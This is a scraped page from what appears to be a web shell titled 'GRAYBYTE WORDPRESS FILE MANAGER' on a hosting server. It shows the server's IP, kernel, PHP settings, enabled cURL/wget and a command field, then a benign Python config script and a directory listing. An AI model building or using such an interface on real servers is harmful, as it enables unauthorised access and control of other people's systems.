GRAYBYTE WORDPRESS FILE MANAGER6443

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/alt/python33/bin/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/alt/python33/bin//python3.3m-x86_64-config
#!/opt/alt/python33/bin/python3.3m
# -*- python -*-

import getopt
import os
import sys
import sysconfig

valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
              'ldflags', 'extension-suffix', 'help', 'abiflags', 'configdir']

def exit_with_usage(code=1):
    print("Usage: {0} [{1}]".format(
        sys.argv[0], '|'.join('--'+opt for opt in valid_opts)), file=sys.stderr)
    sys.exit(code)

try:
    opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
    exit_with_usage()

if not opts:
    exit_with_usage()

pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var

opt_flags = [flag for (flag, val) in opts]

if '--help' in opt_flags:
    exit_with_usage(code=0)

for opt in opt_flags:
    if opt == '--prefix':
        print(sysconfig.get_config_var('prefix'))

    elif opt == '--exec-prefix':
        print(sysconfig.get_config_var('exec_prefix'))

    elif opt in ('--includes', '--cflags'):
        flags = ['-I' + sysconfig.get_path('include'),
                 '-I' + sysconfig.get_path('platinclude')]
        if opt == '--cflags':
            flags.extend(getvar('CFLAGS').split())
        print(' '.join(flags))

    elif opt in ('--libs', '--ldflags'):
        libs = getvar('LIBS').split() + getvar('SYSLIBS').split()
        libs.append('-lpython' + pyver + sys.abiflags)
        # add the prefix/lib/pythonX.Y/config dir, but only if there is no
        # shared library in prefix/lib/.
        if opt == '--ldflags':
            if not getvar('Py_ENABLE_SHARED'):
                libs.insert(0, '-L' + getvar('LIBPL'))
            if not getvar('PYTHONFRAMEWORK'):
                libs.extend(getvar('LINKFORSHARED').split())
        print(' '.join(libs))

    elif opt == '--extension-suffix':
        print(sysconfig.get_config_var('EXT_SUFFIX'))

    elif opt == '--abiflags':
        print(sys.abiflags)

    elif opt == '--configdir':
        print(sysconfig.get_config_var('LIBPL'))

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 03 2024 22:37:42
root / root
0755
easy_install
0.24 KB
November 13 2023 21:19:28
root / linksafe
0755
easy_install-3.3
0.24 KB
November 13 2023 21:19:28
root / linksafe
0755
lswsgi
110.922 KB
February 24 2021 15:27:51
root / linksafe
0755
pip
0.213 KB
November 13 2023 21:16:39
root / linksafe
0755
pip3
0.213 KB
November 13 2023 21:16:39
root / linksafe
0755
pip3.3
0.213 KB
November 13 2023 21:16:39
root / linksafe
0755
pydoc3
0.089 KB
April 17 2024 16:58:11
root / linksafe
0755
pydoc3.3
0.089 KB
April 17 2024 16:58:11
root / linksafe
0755
python3
11.758 KB
April 17 2024 16:58:57
root / linksafe
0755
python3-config
0.436 KB
April 17 2024 16:58:29
root / linksafe
0755
python3.3
11.758 KB
April 17 2024 16:58:57
root / linksafe
0755
python3.3-config
0.436 KB
April 17 2024 16:58:29
root / linksafe
0755
python3.3m
11.758 KB
April 17 2024 16:58:57
root / linksafe
0755
python3.3m-config
0.436 KB
April 17 2024 16:58:29
root / linksafe
0755
python3.3m-x86_64-config
1.938 KB
April 17 2024 16:58:11
root / linksafe
0755
pyvenv
0.237 KB
April 17 2024 16:58:11
root / linksafe
0755
pyvenv-3.3
0.237 KB
April 17 2024 16:58:11
root / linksafe
0755

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF